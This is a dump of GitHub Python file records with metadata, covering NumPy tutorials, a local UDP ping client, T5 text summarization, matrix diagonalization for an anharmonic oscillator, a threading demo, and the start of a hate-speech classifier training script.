getAverage(\"algebra05\",\"MIRTb\")\n getAverage(\"algebra05\",\"PFA\")\n getAverage(\"algebra05\",\"KTM\")\n getAverage(\"algebra05\",\"AFM\")\n\n getAverage(\"hdu\",\"DAS3H\")\n getAverage(\"hdu\",\"DASH\")\n getAverage(\"hdu\",\"IRT\")\n getAverage(\"hdu\",\"MIRTb\")\n getAverage(\"hdu\",\"PFA\")\n getAverage(\"hdu\",\"KTM\")\n getAverage(\"hdu\",\"AFM\")\n \n","repo_name":"hyLiu1994/KnowledgeModels","sub_path":"average_fold.py","file_name":"average_fold.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"73582785651","text":"#List Comprehension Method\nnum = [odd for odd in range(1, 21, 2)]\nprint(num)\n\n#Loop Method *Note: You have to make sure that the print function is not indented.\nnum = []\nfor odd in range(1, 21, 2):\n skip = odd\n num.append(skip)\nprint(num)\n","repo_name":"ICANDIGITAL/crash_course_python","sub_path":"chapter_4/odd_numbers.py","file_name":"odd_numbers.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14030741722","text":"import time\nfrom socket import *\n\npings = 1\n\nwhile pings < 11: \n\n clientSocket = socket(AF_INET, SOCK_DGRAM)\n\n clientSocket.settimeout(1)\n test = 'teste'\n message = bytes(test, encoding='utf8')\n\n addr = (\"127.0.0.1\", 12000)\n\n start = time.time()\n clientSocket.sendto(message, addr)\n\n try:\n data, server = clientSocket.recvfrom(1024)\n end = time.time()\n elapsed = end - start\n print( data ) \n print( pings) \n print( elapsed ) \n \n\n except timeout:\n print ('REQUEST TIMED OUT')\n\n pings = pings - 1","repo_name":"zeraimundo/Socket","sub_path":"Exemplo02/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14353598383","text":"# Original file is located at https://colab.research.google.com/drive/1O1gJsEpM7iijBLsy5gsw6um488eL7FG-\n# [Hugging Face Models](https://huggingface.co/transformers/model_doc/t5.html)\n# [Hugging Face Framework Usage](https://huggingface.co/transformers/usage.html)\n\n\nimport torch\nimport transformers\nimport json\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration, T5Config\n\nprint(torch.__version__)\nprint(transformers.__version__)\n\n\nmodel = T5ForConditionalGeneration.from_pretrained(\"t5-large\")\ntokenizer = T5Tokenizer.from_pretrained(\"t5-large\")\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(f\"{device} is available in torch\")\nprint(model.config)\n\nprint(tokenizer.encode(\"summarize: \"))\nprint(tokenizer.decode(tokenizer.encode(\"summarize: \")))\n\n\ndef summarize(text, ml):\n preprocess_text = text.strip().replace(\"\\n\", \"\")\n t5_prepared_Text = \"summarize: \" + preprocess_text\n print(\"Preprocessed and prepared text: \\n\", t5_prepared_Text)\n\n tokenized_text = tokenizer.encode(t5_prepared_Text, return_tensors=\"pt\").to(device)\n summary_ids = model.generate(\n tokenized_text,\n num_beams=4,\n no_repeat_ngram_size=2,\n min_length=30,\n max_length=ml,\n early_stopping=True,\n )\n return tokenizer.decode(summary_ids[0], skip_special_tokens=True)\n\n\nwith open(\"../data/transformers/sample_text.txt\", mode=\"r\", encoding=\"utf-8\") as file:\n lines = file.readlines()\nprint(\"samples : \", len(lines))\n\nfor line in lines:\n print(\"Number of characters:\", len(line), end=\"\\n\")\n print(\"Summarized text: \\n\", summarize(line, ml=50))\n","repo_name":"mecha2k/py-nlp","sub_path":"src/transformers/07 summarizing_text_t5.py","file_name":"07 summarizing_text_t5.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22258521153","text":"# coding: utf-8\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef draw():\n X = np.linspace(0, 10, 50)\n noise = np.random.normal(0, 0.5, X.shape)\n Y = X * 0.5 + 3 + noise\n\n plt.scatter(X, Y)\n plt.savefig(\"scattergraph.png\")\n plt.show()\n\nif __name__ == \"__main__\":\n draw()","repo_name":"mk43/machine-learning","sub_path":"algorithm/linear-regression/ScatterGraph.py","file_name":"ScatterGraph.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"41233560487","text":"import numpy as np\nimport numpy.linalg as la\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as color\nimport scipy.special\nfrom matplotlib.animation import ArtistAnimation\n\n# TODO: Time functions and compare q and numpy.linalg\n\n\ndef householder_transform_matrix(matrix): # Najlazje je samo lociti postopek za k = 0 (oz. prvi stolpec matrike)\n \"\"\"\n Wonky as f and needs debugging because for some odd reason has problems with zero division and returning nan.\n Dejansko tudi, ko dela, dela ocitno tako slabo, da QR potem rabi DLJE da konca.\n \"\"\"\n a = np.copy(matrix)\n n = np.shape(a)[0] # Numpy dimenzija (ki je enaka pravi dimenziji, samo indeksi tecejo od 0)\n if wonky_exit(a):\n return a\n\n alpha = -np.sign(a[1][0]) * np.sqrt(np.sum([a[j][0]**2 for j in range(1, n)]))\n r = np.sqrt(0.5*alpha**2 - 0.5*alpha*a[1][0])\n v = [0, (a[1][0] - alpha)/(2*r)]\n for j in range(2, n):\n v.append(a[j][0]/(2*r))\n vect = np.array(v)\n P = np.eye(n) - 2*np.outer(vect, vect)\n a = np.matmul(np.matmul(P, a), P)\n img.append([plt.imshow(a, cmap=\"PiYG\", norm=color.CenteredNorm(vcenter=0))])\n # img.append([plt.imshow(a, cmap=\"hot\", norm=color.SymLogNorm(linthresh=0.1))])\n\n for k in range(1, n - 1): # Ne gre cisto do konca! k-2 => n - 1\n alpha = -np.sign(a[k][k-1]) * np.sqrt(np.sum([a[j][k-1]**2 for j in range(k, n)]))\n r = np.sqrt(0.5*(alpha**2 - a[k][k-1]*alpha))\n v = []\n for l in range(0, n):\n if l < k:\n v.append(0)\n elif l == k:\n v.append((a[k][k-1]-alpha)/(2*r))\n elif l > k:\n v.append((a[l][k-1])/(2*r))\n vect = np.array(v)\n P = np.eye(n) - 2 * np.outer(vect, vect)\n a = np.matmul(P, np.matmul(a, P))\n img.append([plt.imshow(a, cmap=\"PiYG\", norm=color.CenteredNorm(vcenter=0))])\n return a\n\n\ndef zero_filter(matrix, epsilon):\n a = np.copy(matrix)\n for index_pairs, value in np.ndenumerate(a):\n if np.abs(value) < epsilon:\n a[index_pairs[0]][index_pairs[1]] = 0\n img.append([plt.imshow(a, cmap=\"PiYG\", norm=color.CenteredNorm(vcenter=0))])\n return a\n\n\ndef wonky_exit(matrix, epsilon=10**-10):\n return np.abs(np.sum(np.abs(matrix)) - np.sum(np.abs(np.diag(matrix)))) < epsilon\n\n\ndef qr_decomp(matrix):\n a = np.copy(matrix)\n m, n = np.shape(a)\n Q = np.eye(m)\n for i in range(n):\n H = np.eye(m)\n H[i:, i:] = householder_transform_vect(a[i:, i]) # Rabimo spodnji kvadrant oz. kvadrat spodaj\n Q = np.matmul(Q, H)\n a = np.matmul(H, a)\n return Q, a\n\n\ndef householder_transform_vect(vector):\n v = vector/(vector[0] + np.copysign(np.sqrt(np.sum([val**2 for c, val in np.ndenumerate(vector)])), vector[0]))\n v[0] = 1\n H = np.eye(np.shape(vector)[0])\n H -= (2/np.dot(v, v)) * np.outer(v, v)\n\n return H\n\n\ndef diagonalize(matrix, tol=10**-15, maxiter=10000):\n \"\"\"\n A diagonalization and eigenvector calculation method\n :param matrix: input matrix to diagonalize\n :param tol: tolerance for zero filter\n :param maxiter: maximum number of iterations\n :return Diagonalized matrix and matrix of eigenvectors\n \"\"\"\n tridiag = matrix # DEBUG STEP?\n # tridiag = householder_transform_matrix(matrix) # Broken for some damn reason\n # tridiag = zero_filter(tridiag, tol)\n s = np.eye(tridiag.shape[0]) # To store eigenvectors\n # print(tridiag)\n for i in range(maxiter):\n # Q = np.eye(tridiag.shape[0])\n print(\"Iter: {}\".format(i))\n if i == maxiter - 1:\n raise Warning(\"Maximum number of iterations exceeded\")\n # warnings.warn(\"Maximum number of iterations exceeded\")\n # break\n if wonky_exit(tridiag):\n print(i)\n break\n Q, R = qr_decomp(tridiag)\n tridiag = zero_filter(np.matmul(Q.T, np.matmul(tridiag, Q)), tol)\n s = np.matmul(s, Q)\n\n return tridiag, s\n\n\ndef lho(n):\n return np.diag([i + 1/2 for i in range(0, n)])\n\n\ndef delta(i, j):\n return int(i == j)\n\n\ndef q_matrix_single(n):\n matrix = np.zeros((n, n))\n for ind, val in np.ndenumerate(matrix):\n i, j = ind\n matrix[i][j] = 0.5 * np.sqrt(i + j + 1) * delta(np.abs(i - j), 1)\n\n return np.matmul(matrix, np.matmul(matrix, np.matmul(matrix, matrix)))\n\n\ndef q_matrix_double(n):\n matrix = np.zeros((n, n))\n for ind, val in np.ndenumerate(matrix):\n i, j = ind\n a = np.sqrt(j * (j - 1)) * delta(i, j - 2)\n b = (2 * j + 1) * delta(i, j)\n c = np.sqrt((j + 1) * (j + 2)) * delta(i, j + 2)\n matrix[i][j] = 0.5 * (a + b + c)\n\n return np.matmul(matrix, matrix)\n\n\ndef q_matrix_quad(n):\n matrix = np.zeros((n, n))\n for ind, val in np.ndenumerate(matrix):\n i, j = ind\n prefac = 1/(2**4) * np.sqrt((2**i * np.math.factorial(i))/(2**j * np.math.factorial(j)))\n a = delta(i, j + 4)\n b = 4*(2 * j + 3) * delta(i, j + 2)\n c = 12*(2*j**2 + 2*j + 1) * delta(i, j)\n d = 16*j*(2*j**2 - 3*j + 1) * delta(i, j - 2)\n e = 16*j*(j**3 - 6*j**2 + 11*j - 6) * delta(i, j - 4)\n matrix[i][j] = prefac * (a + b + c + d + e)\n\n return matrix\n\n\ndef data_sort(diag, Q):\n diag_elements = np.diag(diag)\n vectors = np.copy(Q)\n output = []\n for coord, val in np.ndenumerate(diag_elements):\n output.append([val, vectors[coord[0]]])\n output.sort()\n\n return np.array(output)\n\n\ndef basis(q, n):\n return (2**n * np.math.factorial(n) * np.sqrt(np.pi))**(-1/2) * np.exp(-q**2/2) * scipy.special.eval_hermite(n, q)\n\n\ndef anharmonic(lamb, n, func):\n return lho(n) + lamb*func(n)\n\n\ndef plot_poly(x, vect):\n c = [vect[i]*basis(x, i) for i in range(len(vect))]\n return np.sum(c)\n\n\ndef arrayize(array, function, *args):\n return np.array([function(x, *args) for x in array])\n\n\ndef time_diag(x, lamb): # Idea: x is element of matrix sizes to time diagonalization\n times = []\n for element in list(x):\n data = anharmonic(lamb, element, q_matrix_single)\n pre = time.time()\n diagonalize(data, tol=10**-5)\n post = time.time()\n times.append(post-pre) # Should return seconds elapsed\n\n return np.array(times)\n\n\ndef time_eigh(x, lamb): # Idea: x is element of matrix sizes to time diagonalization\n times = []\n for element in list(x):\n data = anharmonic(lamb, element, q_matrix_single)\n pre = time.time()\n dummy = la.eigh(data)\n post = time.time()\n times.append(post-pre) # Should return seconds elapsed\n\n return np.array(times)\n\n\nfig, ax = plt.subplots()\nimg = [] # PAZI: To mora biti tu preden klices funkcijo, da ima kam spraviti slike za animacijo!\n\nlam = 0.5\ndata = anharmonic(lam, 10, q_matrix_single)\n# data = anharmonic(lam, 10, q_matrix_double)\n# data = anharmonic(lam, 10, q_matrix_quad)\n\ndiag, Q = diagonalize(data, tol=10**-5, maxiter=10000)\n\n# Plot matrix heat map animation\nani = ArtistAnimation(fig, img, interval=90, repeat=False, blit=True)\nplt.title(\"Matrix diagonalization\")\nplt.axis(\"off\")\nplt.colorbar()\n# ani.save(\"1.mp4\", \"ffmpeg\", fps=20)\nplt.show()\n\n# Plot osnovnih vezanih stanj\n# plt.title(\"Prvih 10 vezanih stanj za nemoten harmonski oscilator\")\n# x = np.linspace(-5, 5, 200)\n# plt.plot(x, x**2)\n# plt.ylim(0, 20)\n# for i in range(10):\n# plt.plot(x, basis(x, i) + 2*i)\n# plt.xlabel(r\"$x$\")\n# plt.ylabel(r\"$|n\\rangle$\")\n#\n# plt.show()\n\n# Plot lastnih stanj za motnjo lambda\n# lam = 1\n# plt.title(r\"Prvih 10 lastnih stanj za anharmonski oscilator z $\\lambda = {}$\".format(lam))\n# x = np.linspace(-5, 5, 200)\n# plt.plot(x, x**2 + lam*x**4, label=\"V(x)\", color=\"#FFA0FD\")\n# plt.ylim(-1, 22)\n# sort = data_sort(diag, Q)\n# i = 0\n# color_vec = [\"987284\", \"CDC6AE\", \"A3B4A2\", \"38686A\", \"A18276\", \"682D63\", \"414288\", \"5FB49C\", \"98DFAF\", \"CBBAED\"]\n# for vec in range(Q.shape[1]):\n# plt.plot(x,18 + arrayize(x, plot_poly, Q[:, vec]) - 2*i, color=\"#{}\".format(color_vec[i]))\n# i += 1\n# plt.ylabel(r\"$|n\\rangle$\")\n# columns = [r\"$|n^{0}\\rangle$\", r\"$|n^{1}\\rangle$\", r\"$|n^{2}\\rangle$\", r\"$|n^{3}\\rangle$\",\n# r\"$|n^{4}\\rangle$\", r\"$|n^{5}\\rangle$\", r\"$|n^{6}\\rangle$\", r\"$|n^{7}\\rangle$\",\n# r\"$|n^{8}\\rangle$\", r\"$|n^{9}\\rangle$\"]\n# rows = [r\"$E_n$\"]\n# cell_text = [[round(sort[i][0], 2) for i in range(10)]]\n# plt.table(cellText=cell_text, rowLabels=rows, colLabels=columns, bbox=[0, -0.3, 1, 0.2])\n# plt.subplots_adjust(bottom=0.21)\n# plt.legend()\n# plt.show()\n\n# Plot of diagonalization routine run times\n# x = np.arange(2, 100)\n# y1 = time_diag(x, 0.5)\n# y2 = time_eigh(x, 0.5)\n# plt.title(\"Function run times\")\n# plt.plot(x, y1, color=\"#D7BCE8\", label=\"diagonalize()\")\n# plt.plot(x, y2, color=\"#439A86\", label=\"np.linalg.eigh()\")\n# plt.xlabel(\"N\")\n# plt.yscale(\"log\")\n# plt.ylabel(\"t [s]\")\n# plt.legend()\n# plt.show()\n","repo_name":"pengu5055/mfp03","sub_path":"main_03.py","file_name":"main_03.py","file_ext":"py","file_size_in_byte":8857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15724723488","text":"# -*- coding:utf-8 -*-\n# email:jiangrry@qq.com\n# author:jiangrry\n\n\"\"\"\n event 互斥方法\n 引入\n\"\"\"\n\nfrom threading import Event, Thread\nfrom time import sleep\n\ne = Event() # 创建 Event 对象\ns = None # 全局变量 --> 用于通信 共享资源\n\n\ndef func01():\n print(\"对口令!!!\")\n global s\n s = \"天王盖地虎\"\n e.set() # 终止阻塞\n\n\nt = Thread(target=func01)\nt.start()\nprint(\"对对口令才是自己人\")\ne.wait() # 主线程会阻塞等待\nif s == \"天王盖地虎\":\n print(\"宝塔镇河妖\")\n print(\"自己人\")\nelse:\n print(\"开枪,打死你!\")\n","repo_name":"jiangrry/study","sub_path":"Month2/CONCURRENT/Process&Thread/Thread/demo.thread.py","file_name":"demo.thread.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16164005959","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 12 15:59:10 2021\r\n@author: joelr\r\nEstudos da Biblioteca Numpy\r\n\"\"\"\r\nimport numpy as np\r\n\r\nmy_array = np.array([[1, 2, 3, 4 , 5], [6, 7, 8, 9, 10 ]])\r\n\r\nmy_array = np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])\r\n\r\nx = my_array.copy()\r\n\r\nprint(my_array)\r\nprint(my_array.shape[0]) #Mostra n elementos\r\nprint(np.arange(10)) #Cria vetor sequencial\r\nprint(my_array[1,1])\r\n\r\nmy_array = np.empty([2,5]) #cria valores aleatórios\r\nfor i in range(2):\r\n for j in range(5):\r\n my_array[i,j] = i*j\r\n print(my_array[i,j])\r\n \r\nmy_array = np.zeros([2,5]) #cria matriz de zeros\r\nmy_array = np.ones([2,5]) #cria matriz de 1\r\naleatorio = np.random.random()\r\nmy_array = np.random.random([2,5])\r\nprint(my_array[1,0:4]) \r\nprint(my_array[:,3])\r\nprint(my_array[1][2])\r\nprint(type(my_array))\r\n\r\n\r\na = np.array([[1, 2], [3, 4]])\r\nb = np.array([[5, 6], [7, 8]])\r\n\r\nsoma = a+b\r\ndifference = a-b\r\nproduct = a*b\r\nquotient = a/b\r\n\r\nmatrix_product = a.dot(b)\r\n\r\nfor i in range(my_array.shape[0]):\r\n for j in range(my_array.shape[1]):\r\n for k in range(my_array.shape[2]):\r\n print(my_array[i,j,k])\r\n \r\nmy_array = np.array([1, 2, 3, 4], ndmin=5)\r\nprint(my_array.ndim)\r\n\r\nprint(my_array[1, -1])#indice negativo acessa o final do vetor\r\nprint(my_array[:,0:4:2])\r\nprint(my_array[:,-3:-1])\r\nprint(my_array[:,::2])\r\n\r\nmy_array2 = np.array([1, 2, 3, 4], dtype='S')\r\nmy_array2= np.array(['banana', 'maçã','3'])\r\nprint(my_array.dtype)\r\n\r\nfor i in my_array:\r\n for j in i:\r\n print(j)\r\n\r\n\r\narr = np.array([[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])\r\n\r\nfor x in arr:\r\n print(\"x represents the 2-D array:\")\r\n print(x)\r\n\r\narr1 = np.array([1, 2, 3])\r\n\r\narr2 = np.array([4, 5, 6])\r\n\r\narr = np.concatenate((arr1, arr2))\r\n\r\nprint(arr)\r\n\r\n\r\narr1 = np.array([[1, 2], [3, 4]])\r\n\r\narr2 = np.array([[5, 6], [7, 8]])\r\n\r\narr = np.concatenate((arr1, arr2), axis=1)\r\n\r\nprint(arr)\r\n\r\narr1 = np.array([1, 2, 3])\r\n\r\narr2 = np.array([4, 5, 6])\r\n\r\narr = np.stack((arr1, arr2), axis=1)\r\n\r\nprint(arr)\r\n\r\nword = \"apartamento\"\r\nfor i in range(len(word)-1,-1,-1):\r\n print(word[i])\r\n\r\nnp.array_split(my_array,2)\r\n\r\nx = np.where(my_array == 4) #tuple com linha e coluna \r\n\r\nx = np.where(my_array[0,:]%2 == 0) #posição do número é impar\r\nx = np.where(my_array[0,:]%2 == 1) #posição do número par\r\n\r\n\r\narr = np.array(['banana', 'cherry', 'apple'])\r\narr = np.array([True, False, True])\r\narr = np.array([[3, 2, 4], [5, 0, 1]])\r\n\r\nprint(np.sort(arr))\r\n\r\n#Filtros\r\n\r\narr = np.array([41, 42, 43, 44])#mask\r\n\r\nx = [True, False, True, False]\r\n\r\nnewarr = arr[x]\r\n\r\nprint(newarr)\r\n\r\n\r\nmy_array = np.array([41, 42, 43, 44])\r\n\r\n# Create an empty list\r\nfilter_arr = []\r\n\r\n# go through each element in arr\r\nfor element in arr:\r\n # if the element is higher than 42, set the value to True, otherwise False:\r\n if element > 42:\r\n filter_arr.append(True)\r\n else:\r\n filter_arr.append(False)\r\n\r\nnew_array = my_array[filter_arr]\r\n\r\nprint(filter_arr)\r\nprint(new_array)\r\n\r\narr = np.array([41, 42, 43, 44])\r\n\r\nfilter_arr = arr > 42\r\n\r\nnewarr = arr[filter_arr]\r\n\r\nprint(filter_arr)\r\nprint(newarr)\r\n\r\n#Comandos Ramdom\r\nfrom numpy import random\r\nx = random.randint(100)#Random inteiro\r\nx = random.rand()\r\nx = random.rand(5)\r\nx = random.rand(3,5)\r\nx=random.randint(100, size=(5,5))\r\nx = random.choice([3, 5, 7, 9]) #retorna um valor do vetor\r\nx = random.choice([3,4,5, 6,7,8], size=(3,5)) #Constrói a matrix puxando números da base referida\r\n\r\n#configura probabolidade de escolha dos números\r\nx = random.choice([3, 5, 7, 9], p=[0.1, 0.3, 0.6, 0.0], size=(100))\r\nx = random.choice([3, 5, 7, 9], p=[0.1, 0.3, 0.6, 0.0], size=(3, 5))\r\n\r\nmy_array = np.array([1, 2, 3, 4, 5])\r\n\r\nrandom.shuffle(my_array) #embaralha os números e altera a matriz\r\nrandom.permutation(my_array) #embaralha os números criando uma nova matriz\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nsns.distplot([0, 1, 2, 3, 4, 5], hist = True)\r\nplt.show()\r\n\r\n#Distribuição Normal Analógica\r\n# loc - (Mean) where the peak of the bell exists.\r\n\r\n# scale - (Standard Deviation) how flat the graph distribution should be.\r\n\r\n# size - The shape of the returned array.\r\n\r\nx = random.normal(size=(100, 1000))\r\nx = random.normal(loc=0, scale=5, size=(100, 100))\r\nsns.distplot(x, hist = True)\r\nplt.show()\r\n\r\n\r\n#distribuição binomial (Normal Digital)\r\n# n - number of trials.\r\n# p - probability of occurence of each trial (e.g. for toss of a coin 0.5 each).\r\n\r\n# size - The shape of the returned array.\r\nx = random.binomial(n=10, p=0.5, size=10)\r\nx = random.binomial(n=10, p=0.9, size=1000)\r\nsns.distplot(x, hist=True, kde=False)\r\nplt.show()\r\n\r\n\r\n#comparação entre métodos\r\nsns.distplot(random.normal(loc=50, scale=5, size=1000), hist=False, label='normal')\r\nsns.distplot(random.binomial(n=100, p=0.5, size=1000), hist=False, label='binomial')\r\nplt.show()\r\n\r\n# Poisson Distribution is a Discrete Distribution.\r\n\r\n# It estimates how many times an event can happen in a specified time. e.g. If someone eats twice a day what is probability he will eat thrice?\r\n\r\n# It has two parameters:\r\n\r\n# lam - rate or known number of occurences e.g. 2 for above problem.\r\n\r\n# size - The shape of the returned array.\r\n\r\nx = random.poisson(lam=2, size=10)\r\nsns.distplot(random.poisson(lam=7, size=10000), kde=False)\r\nplt.show()\r\n\r\n#comparação entre normal e poisson\r\nsns.distplot(random.normal(loc=50, scale=7, size=1000), hist=False, label='normal')\r\nsns.distplot(random.poisson(lam=50, size=1000), hist=False, label='poisson')\r\nplt.show()\r\n\r\n# Uniform Distribution\r\n# Used to describe probability where every event has equal chances of occuring.\r\n\r\n# E.g. Generation of random numbers.\r\n\r\n# It has three parameters:\r\n\r\n# a - lower bound - default 0 .0.\r\n\r\n# b - upper bound - default 1.0.\r\n\r\n# size - The shape of the returned array.\r\n\r\nsns.distplot(random.uniform(size=100), hist=False)\r\nplt.show()\r\n\r\n# Logistic Distribution\r\n# Logistic Distribution is used to describe growth.\r\n\r\n# Used extensively in machine learning in logistic regression, neural networks etc.\r\n\r\n# It has three parameters:\r\n\r\n# loc - mean, where the peak is. Default 0.\r\n\r\n# scale - standard deviation, the flatness of distribution. Default 1.\r\n\r\n# size - The shape of the returned array.\r\n\r\nsns.distplot(random.logistic(size=1000), hist=False)\r\nplt.show()\r\n\r\n#gaussiana x logistic distribuition\r\nsns.distplot(random.normal(scale=2, size=1000), hist=False, label='normal')\r\nsns.distplot(random.logistic(size=1000), hist=False, label='logistic')\r\nplt.show()\r\n\r\n# Pareto Distribution\r\n# A distribution following Pareto's law i.e. 80-20 distribution (20% factors cause 80% outcome).\r\n\r\n# It has two parameter:\r\n\r\n# a - shape parameter.\r\n\r\n# size - The shape of the returned array.\r\n\r\nsns.distplot(random.pareto(a=2, size=1000), kde=False)\r\nplt.show()\r\n\r\n\r\n### Functions\r\n#Somar elementos entre vetores\r\nx = [1, 2, 3, 4] #lista\r\ny = [4, 5, 6, 7]\r\n\r\nx = np.array([1, 2, 3])\r\ny = np.array([5, 6, 7])\r\nz = np.add(x, y)\r\nz = np.sum([x,y])\r\nz = np.subtract(x, y)\r\nz = np.multiply(x, y)\r\nz = np.divide(x, y)\r\nz = np.power(x,y)\r\nz = np.mod(x,y)\r\nz = np.remainder(x,y)\r\nz = np.divmod(x,y)\r\nz = np.absolute(x,y)\r\nprint(z)\r\n\r\nx = np.array([-1, 2.555, 3.9])\r\nz = np.trunc(x)\r\nz = np.fix(x)\r\nz = np.around(x)\r\nz = np.floor(x)\r\nz = np.ceil(x)\r\n\r\nx = np.arange(1,10)#não inclui o 10\r\nz = np.log2(x)\r\nz = np.log10(x)\r\nz = np.log()\r\n\r\n\r\nx = np.array([1, 2, 3])\r\nz = np.prod(x)\r\nz = np.prod([x,x])\r\n\r\n# Finding LCM (Lowest Common Multiple)\r\nnum1 = 4\r\nnum2 = 6\r\nx = np.lcm(num1, num2)\r\n\r\n#Finding GCD (Greatest Common Denominator)\r\nnum1 = 6\r\nnum2 = 15\r\nx = np.gcd(num1,num2)\r\nx = np.gcd.reduce([3,5,8,9,24])\r\n\r\n\r\nx = np.sin(np.pi/2)\r\narr = np.array([np.pi/2, np.pi/3, np.pi/4, np.pi/5])\r\nx = np.sin(arr)\r\n\r\narr = np.array([90, 180, 270, 360])\r\nx = np.deg2rad(arr) #converte para radianos\r\n\r\nx = np.sinh(np.pi/2) #função hiperbólica\r\nx = np.arcsinh(1.0)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"JoelRamosC/Algorithms_PYTHON","sub_path":"numpy_comando_basicos.py","file_name":"numpy_comando_basicos.py","file_ext":"py","file_size_in_byte":7945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21994933345","text":"import random\nimport pickle\nimport numpy as np\nfrom nltk.tokenize import word_tokenize\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer as vs\nfrom textstat.textstat import *\nimport preprocessing as cleaner\nfrom statistics import mode\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom nltk.classify import ClassifierI\nfrom sklearn.feature_selection import SelectFromModel\n\n\n\nl_stop = 'a an and are as at be by for from has he in is it its of on the that to was were will with is are am'.split()\nhate = open( \"hate.txt\", 'r' ).read()\noffensive = open( 'offensive.txt', 'r' ).read()\nnone = open( 'nonenew.txt', 'r').read()\n\n\n\ndef converter(tweet):\n sent= cleaner.preprocessing_stage1(tweet)\n sent= \" \".join(sent)\n final_tfidf= new_vectorizer.transform([sent]).toarray()\n final_tfidf= final_tfidf*idf_vals_\n\n sent1= cleaner.preprocessing_for_pos_tags([sent])\n final_pos= new_pos_vectorizer.transform(sent1).toarray()\n\n\n final_other= get_feature_array([tweet])\n\n transformed_tweet = np.concatenate([final_tfidf, final_pos, final_other],axis=1)\n\n \n return transformed_tweet\n\n\n\nclass voted_classifier(ClassifierI):\n \n\n def __init__(self,*classifiers):\n self._classifier=classifiers\n\n \n\n\n def predict_type(self,tweet):\n final_feature= converter(tweet)\n vote=[]\n for c in self._classifier:\n v=c.predict(final_feature)\n vote.append(int(v[0]))\n\n return mode(vote)\n \n \n \n \ndef find_accuracy(y_true, y_pred):\n count=0\n for i in range(len(y_true)):\n if y_pred[i] == y_true[i]:\n count += 1\n return count*100/len(y_true)\n\n\n\n\ndocument = []\nfor i in hate.split('\\n'):\n token_list= cleaner.preprocessing_stage1(i)\n document.append((token_list, 'Hate'))\n\n\nfor i in offensive.split('\\n'):\n token_list= cleaner.preprocessing_stage1(i)\n document.append((token_list, 'Offensive'))\n\n\nfor i in none.split('\\n'):\n token_list= cleaner.preprocessing_stage1(i)\n document.append((token_list, \"None\"))\n\n\n\n\n\n\n\nfeatures = []\ntargets = []\nfor f, t in document: \n features.append(\" \".join(f))\n targets.append(t)\n\n\n \ndoc2 = []\nfor i in hate.split('\\n'):\n doc2.append(i)\nfor i in offensive.split('\\n'):\n doc2.append(i)\nfor i in none.split('\\n'):\n doc2.append(i)\n\n\n\n\nsave_doc = open(\"doc.pickle\", 'wb')\npickle.dump(document, save_doc)\nsave_doc.close()\nprint(\"Pickle of document is made.\")\n\n\nsave_doc2 = open(\"doc2.pickle\", \"wb\")\npickle.dump(doc2, save_doc2)\nsave_doc2.close()\nprint(\"Pickle of doc2 is made.\")\n\n# fx = open( \"doc2.pickle\", \"rb\" )\n# doc2 = pickle.load( fx )\n# fx.close()\n#\n# fx = open( \"doc.pickle\", \"rb\" )\n# document = pickle.load( fx )\n# fx.close()\n\n\n\n\n\n\n\ntarget = []\nfor t in targets:\n if t == \"Hate\":\n target.append([0])\n elif t == \"Offensive\":\n target.append( [1] )\n else:\n target.append( [2] )\n\ntarget = np.array(target)\n\nsave_new = open(\"new_pickle.pickle\",\"wb\")\npickle.dump(target, save_new)\nsave_new.close()\nprint(\"target has been pickled\")\n\n# fx = open(\"new_pickle.pickle\", \"rb\")\n# new = pickle.load(fx)\n# fx.close()\n\n\n\nvectorizer = TfidfVectorizer(\n ngram_range=(1, 3),\n stop_words=l_stop,\n use_idf=True,\n lowercase=True,\n smooth_idf=False,\n norm=None,\n decode_error='replace',\n max_features=10000, \n min_df=5,\n max_df=0.75\n)\n\ntfidf = vectorizer.fit_transform(features).toarray()\nvocab = {v:i for i, v in enumerate(vectorizer.get_feature_names())}\nidf_vals = vectorizer.idf_\n\nfeature_name_tfidf=[]\nfor k,v in vocab.items():\n feature_name_tfidf.append(k)\n\n\nLR_tfidf=LogisticRegression(class_weight=\"balanced\",penalty=\"l1\",C=0.01).fit(tfidf,np.reshape(target, target.shape[0]))\nselect1=SelectFromModel(LR_tfidf,prefit=True)\nx=select1.transform(tfidf)\n\n\n\n\nsave_tfidf = open(\"tfidf.pickle\", \"wb\")\npickle.dump(tfidf, save_tfidf)\nsave_tfidf.close()\nprint(\"tfidf np array has been pickled\")\n\n# fx = open(\"tfidf.pickle\", \"rb\")\n# tfidf = pickle.load(fx)\n# fx.close()\n\n\n\n\n\ntweet_tags= cleaner.preprocessing_for_pos_tags(features)\nsave_tags = open(\"tags.pickle\",\"wb\") \npickle.dump(tweet_tags , 